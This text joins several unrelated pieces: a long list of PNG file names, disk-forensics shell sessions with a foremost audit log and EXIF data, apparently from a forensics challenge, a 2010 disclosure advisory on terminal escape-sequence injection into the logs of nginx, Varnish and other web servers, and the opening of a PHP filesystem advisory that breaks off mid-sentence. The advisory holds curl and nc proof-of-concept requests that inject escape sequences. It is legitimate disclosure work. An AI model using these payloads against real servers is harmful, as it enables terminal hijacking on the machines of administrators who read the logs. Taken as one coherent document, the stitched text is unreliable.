IMG_0846.png
IMG_0847.png
IMG_0848.png
IMG_0849.png
IMG_0850.png
IMG_0851.png
IMG_0852.png
IMG_0853.png
IMG_0854.png
IMG_0855.png
IMG_0856.png
IMG_0857.png
IMG_0858.png
IMG_0859.png
IMG_0860.png
IMG_0861.png
IMG_0862.png
IMG_0863.png
IMG_0864.png
IMG_0865.png
IMG_0866.png
IMG_0867.png
IMG_0868.png
IMG_0869.png
IMG_0870.png
IMG_0871.png
IMG_0872.png
IMG_0873.png
IMG_0874.png
IMG_0875.png
IMG_0876.png
IMG_0877.png
IMG_0878.png
IMG_0879.png
IMG_0880.png
IMG_0881.png
IMG_0882.png
IMG_0883.png
IMG_0884.png
IMG_0885.png
IMG_0886.png
IMG_0887.png
IMG_0888.png
IMG_0889.png
IMG_0890.png
IMG_0891.png
IMG_0892.png
IMG_0893.png
IMG_0894.png
IMG_0895.png
IMG_0896.png
IMG_0897.png
IMG_0898.png
IMG_0899.png
IMG_0900.png
IMG_0901.png
IMG_0902.png
IMG_0903.png
IMG_0904.png
IMG_0905.png
IMG_0906.png
IMG_0907.png
IMG_0908.png
IMG_0909.png
IMG_0910.png
IMG_0911.png
IMG_0912.png
IMG_0913.png
IMG_0914.png
IMG_0915.png
IMG_0916.png
IMG_0917.png
IMG_0918.png
IMG_0919.png
IMG_0920.png
IMG_0921.png
IMG_0922.png
IMG_0923.png
IMG_0924.png
IMG_0925.png
IMG_0926.png
IMG_0927.png
IMG_0928.png
IMG_0929.png
IMG_0930.png
IMG_0931.png
IMG_0932.png
IMG_0933.png
IMG_0934.png
IMG_0935.png
IMG_0936.png
IMG_0937.png
IMG_0938.png
IMG_0939.png
IMG_0940.png
IMG_0941.png
IMG_0942.png
IMG_0943.png
IMG_0944.png
IMG_0945.png
IMG_0946.png
IMG_0947.png
IMG_0948.png
IMG_0949.png
IMG_0950.png
IMG_0951.png
IMG_0952.png
IMG_0953.png
IMG_0954.png
IMG_0955.png
IMG_0956.png
IMG_0957.png
IMG_0958.png
IMG_0959.png
IMG_0960.png
IMG_0961.png
IMG_0962.png
IMG_0963.png
IMG_0964.png
IMG_0965.png
IMG_0966.png
IMG_0967.png
IMG_0968.png
IMG_0969.png
IMG_0970.png
IMG_0971.png
IMG_0972.png
IMG_0973.png
IMG_0974.png
IMG_0975.png
IMG_0976.png
IMG_0977.png
IMG_0978.png
IMG_0979.png
IMG_0980.png
IMG_0981.png
IMG_0982.png
IMG_0983.png
IMG_0984.png
IMG_0985.png
IMG_0986.png
IMG_0987.png
IMG_0988.png
IMG_0989.png
IMG_0990.png
IMG_0991.png
IMG_0992.png
IMG_0993.png
IMG_0994.png
IMG_0995.png
IMG_0996.png
IMG_0997.png
IMG_0998.png
IMG_0999.png
IMG_1000.png
IMG_1001.png
IMG_1002.png
IMG_1003.png
IMG_1004.png
IMG_1005.png
IMG_1006.png
IMG_1007.png
IMG_1008.png
IMG_1009.png
IMG_1010.png
IMG_1011.png
IMG_1012.png
IMG_1013.png
IMG_1014.png
IMG_1015.png
IMG_1016.png
IMG_1017.png
IMG_1018.png
IMG_1019.png
IMG_1020.png
IMG_1021.png
IMG_1022.png
IMG_1023.png
IMG_1024.png
IMG_1025.png
IMG_1026.png
IMG_1027.png
IMG_1028.png
IMG_1029.png
IMG_1030.png
IMG_1031.png
IMG_1032.png
IMG_1033.png
IMG_1034.png
IMG_1035.png
IMG_1036.png
IMG_1037.png
IMG_1038.png
IMG_1039.png
IMG_1040.png
IMG_1041.png
IMG_1042.png
IMG_1043.png
IMG_1044.png
IMG_1045.png
IMG_1046.png
IMG_1047.png
IMG_1048.png
IMG_1049.png
IMG_1050.png
IMG_1051.png
IMG_1052.png
IMG_1053.png
IMG_1054.png
IMG_1055.png
IMG_1056.png
IMG_1057.png
IMG_1058.png
IMG_1059.png
IMG_1060.png
IMG_1061.png
IMG_1062.png
IMG_1063.png
IMG_1064.png
IMG_1065.png
IMG_1066.png
IMG_1067.png
IMG_1068.png
IMG_1069.png
IMG_1070.png
IMG_1071.png
IMG_1072.png
IMG_1073.png
IMG_1074.png
IMG_1075.png
IMG_1076.png
IMG_1077.png
IMG_1078.png
IMG_1079.png
IMG_1080.png
IMG_1081.png
IMG_1082.png
IMG_1083.png
IMG_1084.png
IMG_1085.png
IMG_1086.png
IMG_1087.png
IMG_1088.png
IMG_1089.png
IMG_1090.png
IMG_1091.png
IMG_1092.png
IMG_1093.png
IMG_1094.png
IMG_1095.png
IMG_1096.png
IMG_1097.png
IMG_1098.png
IMG_1099.png
IMG_1100.png
IMG_1101.png
IMG_1102.png
IMG_1103.png
IMG_1104.png
IMG_1105.png
IMG_1106.png
IMG_1107.png
IMG_1108.png
IMG_1109.png
IMG_1110.png
IMG_1111.png
IMG_1112.png
IMG_1113.png
IMG_1114.png
IMG_1115.png
IMG_1116.png
IMG_1117.png
IMG_1118.png
IMG_1119.png
IMG_1120.png
IMG_1121.png

$ pnginfo IMG_1116.png
IMG_1116.png...
Image Width: 118 Image Length: 810
Bitdepth (Bits/Sample): 8
Channels (Samples/Pixel): 4
Pixel depth (Pixel Depth): 32
Colour Type (Photometric Interpretation): RGB with alpha channel
Image filter: Single row per byte filter
Interlacing: No interlacing
Compression Scheme: Deflate method 8, 32k window
Resolution: 0, 0 (unit unknown)
FillOrder: msb-to-lsb
Byte Order: Network (Big Endian)
Number of text strings: 0 of 0

$ convert -background skyblue *.png -layers flatten +repage
Flatten.png

$ file f100_6db079ca91c4860f.bin
f100_6db079ca91c4860f.bin: x86 boot sector; partition 1: ID=0x7,
starthead 0, startsector 31, 31558 sectors, extended partition table
(last)11, code offset 0x0

$ xxd -l 512 f100_6db079ca91c4860f.bin
0000000: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000010: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000020: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000030: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000040: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000050: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000060: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000070: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000080: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000090: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000a0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000b0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000c0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000d0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000e0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000f0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000100: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000110: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000120: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000130: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000140: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000150: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000160: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000170: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000180: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000190: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00001a0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00001b0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00001c0: 0101 0700 dffa 1f00 0000 467b 0000 0000  ..........F{....
00001d0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00001e0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00001f0: 0000 0000 0000 0000 0000 0000 0000 55aa  ..............U.

$ xxd -l 512 -s 15872 f100_6db079ca91c4860f.bin
0003e00: eb52 904e 5446 5320 2020 2000 0208 0000  .R.NTFS    .....
0003e10: 0000 0000 00f8 0000 3f00 ff00 1f00 0000  ........?.......
0003e20: 0000 0000 8000 0000 457b 0000 0000 0000  ........E{......
0003e30: 2205 0000 0000 0000 0200 0000 0000 0000  "...............
0003e40: f600 0000 0100 0000 631f 85d4 4885 d422  ........c...H.."
0003e50: 0000 0000 fa33 c08e d0bc 007c fb68 c007  .....3.....|.h..
0003e60: 1f1e 6866 00cb 8816 0e00 6681 3e03 004e  ..hf......f.>..N
0003e70: 5446 5375 15b4 41bb aa55 cd13 720c 81fb  TFSu..A..U..r...
0003e80: 55aa 7506 f7c1 0100 7503 e9dd 001e 83ec  U.u.....u.......
0003e90: 1868 1a00 b448 8a16 0e00 8bf4 161f cd13  .h...H..........
0003ea0: 9f83 c418 9e58 1f72 e13b 060b 0075 dba3  .....X.r.;...u..
0003eb0: 0f00 c12e 0f00 041e 5a33 dbb9 0020 2bc8  ........Z3... +.
0003ec0: 66ff 0611 0003 160f 008e c2ff 0616 00e8  f...............
0003ed0: 4b00 2bc8 77ef b800 bbcd 1a66 23c0 752d  K.+.w......f#.u-
0003ee0: 6681 fb54 4350 4175 2481 f902 0172 1e16  f..TCPAu$....r..
0003ef0: 6807 bb16 6870 0e16 6809 0066 5366 5366  h...hp..h..fSfSf
0003f00: 5516 1616 68b8 0166 610e 07cd 1a33 c0bf  U...h..fa....3..
0003f10: 2810 b9d8 0ffc f3aa e95f 0190 9066 601e  (........_...f`.
0003f20: 0666 a111 0066 0306 1c00 1e66 6800 0000  .f...f.....fh...
0003f30: 0066 5006 5368 0100 6810 00b4 428a 160e  .fP.Sh..h...B...
0003f40: 0016 1f8b f4cd 1366 595b 5a66 5966 591f  .......fY\[ZfYfY.
0003f50: 0f82 1600 66ff 0611 0003 160f 008e c2ff  ....f...........
0003f60: 0e16 0075 bc07 1f66 61c3 a0f8 01e8 0900  ...u...fa.......
0003f70: a0fb 01e8 0300 f4eb fdb4 018b f0ac 3c00  ..............<.
0003f80: 7409 b40e bb07 00cd 10eb f2c3 0d0a 4120  t.............A
0003f90: 6469 736b 2072 6561 6420 6572 726f 7220  disk read error
0003fa0: 6f63 6375 7272 6564 000d 0a42 4f4f 544d  occurred...BOOTM
0003fb0: 4752 2069 7320 6d69 7373 696e 6700 0d0a  GR is missing...
0003fc0: 424f 4f54 4d47 5220 6973 2063 6f6d 7072  BOOTMGR is compr
0003fd0: 6573 7365 6400 0d0a 5072 6573 7320 4374  essed...Press Ct
0003fe0: 726c 2b41 6c74 2b44 656c 2074 6f20 7265  rl+Alt+Del to re
0003ff0: 7374 6172 740d 0a00 8ca9 bed6 0000 55aa  start.........U.

$ mmls f100_6db079ca91c4860f.bin
DOS Partition Table
Offset Sector: 0
Units are in 512-byte sectors

Slot    Start        End          Length       Description
00:  Meta    0000000000   0000000000   0000000001   Primary Table
(#0)
01:  -----   0000000000   0000000030   0000000031   Unallocated
02:  00:00   0000000031   0000031588   0000031558   NTFS (0x07)
03:  -----   0000031589   0000031615   0000000027   Unallocated

$ dd if=f100_6db079ca91c4860f.bin of=p0.bin bs=512 skip=0 count=1
1+0 records in
1+0 records out
512 bytes (512 B) copied, 5.0705e-05 s, 10.1 MB/s
$ dd if=f100_6db079ca91c4860f.bin of=p1.bin bs=512 skip=0 count=31
31+0 records in
31+0 records out
15872 bytes (16 kB) copied, 0.000218534 s, 72.6 MB/s
$ dd if=f100_6db079ca91c4860f.bin of=p2.bin bs=512 skip=31
31585+0 records in
31585+0 records out
16171520 bytes (16 MB) copied, 0.298363 s, 54.2 MB/s
$ dd if=f100_6db079ca91c4860f.bin of=p3.bin bs=512 skip=31589
27+0 records in
27+0 records out
13824 bytes (14 kB) copied, 0.000205892 s, 67.1 MB/s

$ file p\*.bin
p0.bin: x86 boot sector; partition 1: ID=0x7, starthead 0,
startsector 31, 31558 sectors, extended partition table (last)11,
code offset 0x0
p1.bin: x86 boot sector; partition 1: ID=0x7, starthead 0,
startsector 31, 31558 sectors, extended partition table (last)11,
code offset 0x0
p2.bin: x86 boot sector, code offset 0x52, OEM-ID "NTFS    ",
sectors/cluster 8, reserved sectors 0, Media descriptor 0xf8,
heads 255, hidden sectors 31, dos < 4.0 BootSector (0x0)
p3.bin: data

$ foremost -i p0.bin -o p0
Processing: p0.bin
|*|
$ foremost -i p1.bin -o p1
Processing: p1.bin
|*|
$ foremost -i p2.bin -o p2
Processing: p2.bin
|*|
$ foremost -i p3.bin -o p3
Processing: p3.bin
|*|

$ cat p2/audit.txt
Foremost version 1.5.7 by Jesse Kornblum, Kris Kendall, and Nick
Mikus
Audit File

Foremost started at Sun Jun 20 17:47:43 2010
Invocation: foremost -i p2.bin -o p2
Output directory: /home/jekil/Desktop/p2
Configuration file: /etc/foremost.conf
------------------------------------------------------------------
File: p2.bin
Start: Sun Jun 20 17:47:43 2010
Length: 15 MB (16171520 bytes)

Num     Name (bs=512)           Size     File Offset     Comment

0:    00000312.jpg           11 KB          159744
1:    00000336.jpg            4 KB          172032
2:    00000344.jpg            1 KB          176128
3:    00001032.jpg           13 KB          528384
4:    00001064.jpg           36 KB          544768
5:    00001144.jpg           32 KB          585728
6:    00001216.jpg            4 KB          622592
7:    00000288.png            9 KB          147456       (634 x 278)
Finish: Sun Jun 20 17:47:43 2010

8 FILES EXTRACTED

jpg:= 7
png:= 1
------------------------------------------------------------------

Foremost finished at Sun Jun 20 17:47:43 2010

File size : 4378 bytes
File date : 2010:05:22 01:57:57
Resolution : 116 x 102
GPS Latitude : N 36d 8m 8.5s
GPS Longitude: E 115d 9m 29s
Comment : Who is the author?ASCII

n.o.t.d.e.l.e.t.e.d.,.n.e.v.e.r.existed

Nginx, Varnish, Cherokee, thttpd, mini-httpd, WEBrick, Orion, AOLserver,
Yaws and Boa log escape sequence injection

 Name              Nginx, Varnish, Cherokee, thttpd, mini-httpd, WEBrick,
                   Orion, AOLserver, Yaws and Boa log escape sequence
                   injection
 Systems Affected  nginx 0.7.64
                   Varnish 2.0.6
                   Cherokee 0.99.30
                   mini_httpd 1.19
                   thttpd 2.25b0
                   WEBrick 1.3.1
                   Orion 2.0.7
                   AOLserver 4.5.1
                   Yaws 1.85
                   Boa 0.94.14rc21
 Severity          Medium
 Impact (CVSSv2)   Medium 5/10, vector: (AV:N/AC:L/Au:N/C:P/I:N/A:N)
 Vendor            http://www.nginx.net/
                   http://varnish.projects.linpro.no/
                   http://www.cherokee-project.com/
                   http://www.ruby-lang.org/
                   http://www.acme.com/software/thttpd/
                   http://www.acme.com/software/mini_httpd/
                   http://www.orionserver.com/
                   http://www.aolserver.com/
                   http://yaws.hyber.org/
                   http://www.boa.org/
 Advisory          http://www.ush.it/team/ush/hack_httpd_escape/adv.txt
 Authors           Giovanni "evilaliv3" Pellerano (evilaliv3 AT ush DOT it)
                   Alessandro "jekil" Tanasi (alessandro AT tanasi DOT it)
                   Francesco "ascii" Ongaro (ascii AT ush DOT it)
 Date              20100110

I. BACKGROUND

nginx is a HTTP and reverse proxy server written by Igor Sysoev.
Varnish is a state-of-the-art, high-performance HTTP accelerator.
Cherokee is a very fast, flexible and easy to configure Web Server.
thttpd is a simple, small, portable, fast, and secure HTTP server.
mini_httpd is a small HTTP server.
WEBrick is a Ruby library providing simple HTTP web server services.
Orion Application Server is a pure java application-server.
AOLserver is America Online's Open-Source web server.
Yaws is a HTTP high perfomance 1.1 webserver.
Boa is a single-tasking HTTP server.

II. DESCRIPTION

Nginx, Varnish, Cherokee, thttpd, mini-httpd, WEBrick, Orion, AOLserver,
Yaws and Boa are subject to logs escape sequence injection
vulnerabilites.

Escape sequences are special characters sequences that are used to
instruct the terminal to perform special operations like executing
commands [4, 5] or dumping the buffer to a file [6, 7].

When the webserver is executed in foreground in a pty or when the
logfiles are viewed with tools like "cat" or "tail" such control chars
reach the terminal and are executed.

III. ANALYSIS

Summary:

 A) "nginx" log escape sequence injection
   (Affected versions: 0.7.64 and probably earlier versions)

 B) "Varnish" log escape sequence injection
   (Affected versions: 2.0.6 and probably earlier versions)

 C) "Cherokee" log escape sequence injection
   (Affected versions: 0.99.30 and probably earlier versions)

 D) "thttpd" log escape sequence injection
   (Affected versions: thttpd/2.25b and probably earlier versions)

 E) "mini_httpd" log escape sequence injection
   (Affected versions: 1.19 and probably earlier versions)

 F) "WEBrick" log escape sequence injection
   (Affected versions: 1.3.1 and probably earlier versions)

 G) "Orion" log escape sequence injection
   (Affected versions: 2.0.7 and probably earlier versions)

 H) "AOLserver" log escape sequence injection
   (Affected versions: 4.5.1 and probably earlier versions)

 I) "Yaws" log escape sequence injection
   (Affected versions: 1.85 and probably earlier versions)

 L) "Boa" log escape sequence injection
   (Affected versions: 0.94.14rc21 and probably earlier versions)

A) "nginx" log escape sequence injection

One of the following two Proofs Of Concept can be used in order to
verify the vulnerability.

curl -kis http://localhost/%1b%5d%32%3b%6f%77%6e%65%64%07%0a

echo -en "GET /\x1b]2;owned?\x07\x0a\x0d\x0a\x0d" > payload
nc localhost 80 < payload

B) "Varnish" log escape sequence injection

One of the following two Proofs Of Concept can be used in order to
verify the vulnerability.

xterm varnishlog

echo -en "GET /\x1b]2;owned?\x07\x0a\x0d\x0a\x0d" > payload
nc localhost 80 < payload

C) "Cherokee" log escape sequence injection

The following Proof Of Concept can be used in order to verify the
vulnerability.

curl -kis http://localhost/%1b%5d%32%3b%6f%77%6e%65%64%07%0a

D) "thttpd" log escape sequence injection

The following Proof Of Concept can be used in order to verify the
vulnerability.

echo -en "GET /\x1b]2;owned?\x07\x0a\x0d\x0a\x0d" > payload
nc localhost 80 < payload

E) "mini_httpd" log escape sequence injection

One of the following two Proofs Of Concept can be used in order to
verify the vulnerability.

curl -kis http://localhost/%1b%5d%32%3b%6f%77%6e%65%64%07%0a

echo -en "GET /\x1b]2;owned?\x07\x0a\x0d\x0a\x0d" > payload
nc localhost 80 < payload

F) "WEBrick" log escape sequence injection

One of the following two Proofs Of Concept can be used in order to
verify the vulnerability.

curl -kis http://localhost/%1b%5d%32%3b%6f%77%6e%65%64%07%0a

echo -en "GET /\x1b]2;owned?\x07\x0a\x0d\x0a\x0d" > payload
nc localhost 80 < payload

G) "Orion" log escape sequence injection

One of the following two Proofs Of Concept can be used in order to
verify the vulnerability.

curl -kis http://localhost/%1b%5d%32%3b%6f%77%6e%65%64%07%0a

echo -en "GET /\x1b]2;owned?\x07\x0a\x0d\x0a\x0d" > payload
nc localhost 80 < payload

H) "AOLserver" log escape sequence injection

The following Proof Of Concept can be used in order to verify the
vulnerability.

echo -en "GET /\x1b]2;owned?\x07\x0a\x0d\x0a\x0d" > payload
nc localhost 80 < payload

I) "Yaws" log escape sequence injection

One of the following two Proofs Of Concept can be used in order to
verify the vulnerability.

curl -kis http://localhost/%1b%5d%32%3b%6f%77%6e%65%64%07%0a

echo -en "GET /\x1b]2;owned?\x07\x0a\x0d\x0a\x0d" > payload
nc localhost 80 < payload

L) "Boa" log escape sequence injection

The following Proof Of Concept can be used in order to verify the
vulnerability.

curl -kis http://localhost/%1b%5d%32%3b%6f%77%6e%65%64%07%0a

IV. DETECTION

Services like Shodan (shodan.surtri.com) or Google can be used to get an
approximate idea on the usage of the products.

Some examples:
 - http://shodan.surtri.com/?q=nginx
 - http://www.google.com/search?q="powered+by+Cherokee"
 - curl -kis http://www.antani.gov | grep -E "Server: Orion/2.0.8"

V. WORKAROUND

Cherokee and WEBrick (Ruby) released related security fixes and releases
as detailed below.

Cherokee issued a public patch that resolved the issue but caused some
issues (http://svn.cherokee-project.com/changeset/3944) and has been
later replaced (http://svn.cherokee-project.com/changeset/3977) by a
better fix that both resolve the issue and doesn't affect the normal
webserver behavior. Use the second patch or a safe release like 0.99.34
or above. If you are using Cherokee 0.99.32 please note that your build
uses the first patch.

Webrick (Ruby) sent us the following patch and issued a release
that fixes the issues. Detailed informations are available at the
following url:

http://www.ruby-lang.org/en/news/2010/01/10/webrick-escape-sequence-injection

The patch we reviewed is the following but please refer to the vendor's
article for exact informations.

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

Index: lib/webrick/httpstatus.rb
===================================================================

--- lib/webrick/httpstatus.rb   (revision 26065)
+++ lib/webrick/httpstatus.rb   (working copy)
@@ -13,5 +13,15 @@ module WEBrick
   module HTTPStatus

-    class Status      < StandardError; end
+    class Status      < StandardError
+      def initialize(message, *rest)
+        super(AccessLog.escape(message), *rest)
+      end
+      class << self
+        attr_reader :code, :reason_phrase
+      end
+      def code() self::class::code end
+      def reason_phrase() self::class::reason_phrase end
+      alias to_i code
+    end
     class Info        < Status; end
     class Success     < Status; end
@@ -69,4 +79,5 @@ module WEBrick

     StatusMessage.each{|code, message|
+      message.freeze
       var_name = message.gsub(/[ \-]/,'_').upcase
       err_name = message.gsub(/[ \-]/,'')
@@ -80,16 +91,10 @@ module WEBrick
       end

-      eval %-
-        RC_#{var_name} = #{code}
-        class #{err_name} < #{parent}
-          def self.code() RC_#{var_name} end
-          def self.reason_phrase() StatusMessage[code] end
-          def code() self::class::code end
-          def reason_phrase() self::class::reason_phrase end
-          alias to_i code
-        end
-      -
-
-      CodeToError[code] = const_get(err_name)
+      const_set("RC_#{var_name}", code)
+      err_class = Class.new(parent)
+      err_class.instance_variable_set(:@code, code)
+      err_class.instance_variable_set(:@reason_phrase, message)
+      const_set(err_name, err_class)
+      CodeToError[code] = err_class
     }

Index: lib/webrick/httprequest.rb
===================================================================
--- lib/webrick/httprequest.rb  (revision 26065)
+++ lib/webrick/httprequest.rb  (working copy)
@@ -267,9 +267,5 @@ module WEBrick
         end
       end
-      begin
-        @header = HTTPUtils::parse_header(@raw_header.join)
-      rescue => ex
-        raise  HTTPStatus::BadRequest, ex.message
-      end
+      @header = HTTPUtils::parse_header(@raw_header.join)
     end

Index: lib/webrick/httputils.rb
===================================================================
--- lib/webrick/httputils.rb    (revision 26065)
+++ lib/webrick/httputils.rb    (working copy)
@@ -130,9 +130,9 @@ module WEBrick
           value = $1
           unless field
-            raise "bad header '#{line.inspect}'."
+            raise HTTPStatus::BadRequest, "bad header '#{line}'."
           end
           header[field][-1] << " " << value
         else
-          raise "bad header '#{line.inspect}'."
+          raise HTTPStatus::BadRequest, "bad header '#{line}'."
         end
       }

Index: lib/webrick/accesslog.rb
===================================================================
--- lib/webrick/accesslog.rb    (revision 26065)
+++ lib/webrick/accesslog.rb    (working copy)
@@ -54,5 +54,5 @@ module WEBrick
            raise AccessLogError,
              "parameter is required for \"#{spec}\"" unless param
-           params[spec][param] || "-"
+           param = params[spec][param] ? escape(param) : "-"
          when ?t
            params[spec].strftime(param || CLF_TIME_FORMAT)
@@ -60,8 +60,16 @@ module WEBrick
            "%"
          else
-           params[spec]
+           escape(params[spec].to_s)
          end
       }
     end
+
+    def escape(data)
+      if data.tainted?
+        data.gsub(/[[:cntrl:]\\]+/) {$&.dump[1...-1]}.untaint
+      else
+        data
+      end
+    end
   end
 end

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

VI. VENDOR RESPONSE

We contacted the vendors of eleven affected webservers, counting the
previous advisory [1] for Jetty. Three fixed the issue (Cherokee,
WEBrick/Ruby and Jetty), one will not fix the issue (Varnish) and one
acknowledged the issue (AOLserver).

Nginx              NO-RESPONSE
Cherokee           FIXED
thttpd             NO-RESPONSE
mini-httpd         NO-RESPONSE
WEBrick            FIXED
Orion              NO-RESPONSE
AOLserver          ACK
Yaws               NO-RESPONSE
Boa                NO-RESPONSE
Varnish            WONT-FIX

The response was overall good and it was nice to work with them, in
particular we want to thank Cherokee's staff, Ruby's staff, Raphael
Geissert (Debian) and Steven M. Christey (Mitre) for the support.

Poul-Henning Kamp (Varnish) replied to our contact email with the
following email that we quote as-is.

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

The official Varnish response, which I ask that you include in its
entirety in your advisory, if you list Varnish as "vulnerable" in it:

This is not a security problem in Varnish or any other piece of software
which writes a logfile.

The real problem is the mistaken belief that you can cat(1) a random
logfile to your terminal safely.

This is not a new issue. I first remember the issue with xterm(1)'s
inadvisably implemented escape-sequences in a root-context, brought up
heatedly, in 1988, possibly late 1987, at Copenhagens University
Computer Science dept. (Diku.dk). Since then, nothing much have changed.

The wisdom of terminal-response-escapes in general have been questioned
at regular intervals, but still none of the major terminal emulation
programs have seen fit to discard these sequences, probably in a
misguided attempt at compatibility with no longer used 1970'es
technology.

I admit that listing "found a security hole in all HTTP-related programs
that write logfiles" will look more impressive on a resume, but I think
it is misguided and a sign of trophy-hunting having overtaken common
sense.

Instead of blaming any and all programs which writes logfiles, it would
be much more productive, from a security point of view, to get the
terminal emulation programs to stop doing stupid things, and thus fix
this and other security problems once and for all.

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

We would like to punctuate the following facts:

1) We totally agree that the root of the problem is an unwise design in
the terminal emulators. If in 70' controls were sent out of band on a
secondary channel we would not have the equivalent of Blue Boxing in the
terminal.

This is a known issue from years. We didn't invented this attack vector
and never claimed so. We don't think that design changes will happen in
the short or mid term so it's better to have a proactive approach and
sanitize outputs where functionalities are likely to not be affected at
all like in this case.

Security in complex systems requires some synergy.

2) Varnish is the only program that doesn't need a "cat" program as logs
are stored in memory and displayed using the "varnishlog" utility.

2) Apache fixed a similiar bug (CVE-2003-0020), "Low: Error log escape
filtering", in 2004 (six years ago). The bug was affecting Apache up
to 1.3.29 [8] or 2.0.48 [9] depending on the branch.

Take you conclusion, criticize if you want. In the meantime things are a
little safer.

VII. CVE INFORMATION

CVE-2009-4487 nginx 0.7.64
CVE-2009-4488 Varnish 2.0.6
CVE-2009-4489 Cherokee 0.99.30
CVE-2009-4490 mini_httpd 1.19
CVE-2009-4491 thttpd 2.25b0
CVE-2009-4492 WEBrick 1.3.1
CVE-2009-4493 Orion 2.0.7
CVE-2009-4494 AOLserver 4.5.1
CVE-2009-4495 Yaws 1.85
CVE-2009-4496 Boa 0.94.14rc21

VIII. DISCLOSURE TIMELINE

20091117 Bug discovered
20091208 First vendor contact
20091209 Cherokee team confirms vulnerability (Alvaro Lopez Ortega)
20091209 Alvaro Lopez Ortega commits Cherokee patch
20091210 Ruby team confirms vulnerability (Shugo Maeda)
20091211 Shugo Maeda sends us webrick patch for evaulation
20091211 AOLserver confirms vulnerability (Jim Davidson)
20091221 Contacted Raphael Geissert (Debian Security)
20091223 Contacted Steven M. Christey (mitre.org)
20091230 Raphael Geissert forwards to Redhat, Debian, Ubuntu and Mitre
20091230 CVEs assigned by Steven M. Christey
20100105 Poul-Henning (Varnish) Kamp said WONT-FIX
20100105 Ruby team is ready for commit (Urabe Shyouhei)
20100106 Second vendor contact
20100110 Advisory release

IX. REFERENCES

[1] Jetty 6.x and 7.x Multiple Vulnerabilities
    http://www.ush.it/team/ush/hack-jetty6x7x/jetty-adv.txt
[2] Apache does not filter terminal escape sequences from error logs
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0020
[3] Apache does not filter terminal escape sequences from access logs
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0083
[4] Debian GNU/Linux XTERM (DECRQSS/comments) Weakness Vulnerability
    http://www.milw0rm.com/exploits/7681
[5] Terminal Emulator Security Issues
    http://marc.info/?l=bugtraq&m=104612710031920&w=2
[6] Eterm Screen Dump Escape Sequence Local File Corruption Vulnerability
    http://www.securityfocus.com/bid/6936/discuss
[7] RXVT Screen Dump Escape Sequence Local File Corruption Vulnerability
    http://www.securityfocus.com/bid/6938/discuss
[8] Apache httpd 1.3 vulnerabilities
    http://httpd.apache.org/security/vulnerabilities_13.html
[9] Apache httpd 2.2 vulnerabilities
    http://httpd.apache.org/security/vulnerabilities_22.html

X. CREDIT

Giovanni "evilaliv3" Pellerano, Alessandro "jekil" Tanasi and
Francesco "ascii" Ongaro are credited with the discovery of this
vulnerability.

Giovanni "evilaliv3" Pellerano
web site: http://www.ush.it/, http://www.evilaliv3.org/
mail: evilaliv3 AT ush DOT it

Alessandro "jekil" Tanasi
web site: http://www.tanasi.it/
mail: alessandro AT tanasi DOT it

Francesco "ascii" Ongaro
web site: http://www.ush.it/
mail: ascii AT ush DOT it

X. LEGAL NOTICES

Copyright (c) 2009 Francesco "ascii" Ongaro

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without mine express
written consent. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please email me for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.

PHP filesystem attack vectors - Take Two

 Name              PHP filesystem attack vectors - Take Two
 Systems Affected  PHP and PHP+Suhosin
 Vendor            http://www.php.net/
 Advisory          http://www_ush_it/team/ush/hack-phpfs/phpfs_mad_2.txt
 Authors           Giovanni "evilaliv3" Pellerano (evilaliv3 AT ush DOT it)
                   Antonio "s4tan" Parata (s4tan AT ush DOT it)
                   Francesco "ascii" Ongaro (ascii AT ush DOT it)
                   Alessandro "jekil" Tanasi (alessandro AT tanasi DOT it)
 Date              20090725

I)    Introduction
II)   PHP arbitrary Local File Inclusion testing
III)  PHP arbitrary Local File Inclusion results
IV)   PHP arbitrary File Open testing
V)    PHP arbitrary File Open results
VI)   PHP arbitrary Remote File Upload testing
VII)  PHP arbitrary Remote File Upload results
VIII) Conclusions
IX)   References

I) Introduction

This is the second part and continuation of our previous "PHP filesystem
attack vectors" [1] research.

Working with s4tan and ascii on the "SugarCRM 5.2.0e Remote Code
Execution" advisory [2] we noticed a strange behaviour on Windows OS:
trying to upload a file named "a.php." results in just "a.php".

Analyzing this we noticed that every time an application, or manually,
